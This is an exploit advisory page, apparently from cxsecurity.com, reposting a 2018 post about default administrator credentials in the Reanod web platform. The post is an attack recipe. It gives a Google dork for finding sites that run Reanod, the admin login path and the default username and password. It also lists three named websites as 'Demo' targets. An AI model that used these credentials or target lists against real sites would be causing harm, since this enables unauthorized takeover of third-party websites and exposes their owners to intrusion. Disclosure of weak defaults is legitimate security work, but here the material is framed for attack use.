Reanod Default Admin Password Vulnerability

2018.09.20
tr TrazeR (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################# # Exploit Title: Reanod Default Admin Password Vulnerability # Author : TrazeR & AKINCILAR # Google Dork : intext:"Powered by reanod" # Tested on : Kali Linux & Windows # Date : 09.19.2018 # Vendor Home: http://www.reanod.com/ # Blog : http://www.trazer.org/ # Forum : http://cyber-warrior.org/ ################################################################################# [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] root@TrazeR:~# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Manager-Url: /admin [+] UserName: Reanod68 OR ===> admin [+] Password: reanod6688 Demo: http://www.ricemachinechina.com/admin.php http://www.epic-crystal.com/wp-login.php http://www.ynfmachineryparts.com/admin/ Greet'Z : AKINCILAR & Cyber-WarrioR.org And All Members BU GÜCE SAYGI DUYUN ! [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

References:

https://www.trazer.org/2018/09/reanod-default-admin-password.html
https://www.cyber-warrior.org/Forum/reanod-default-admin-password-vuln_629129%2C1.cwx


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top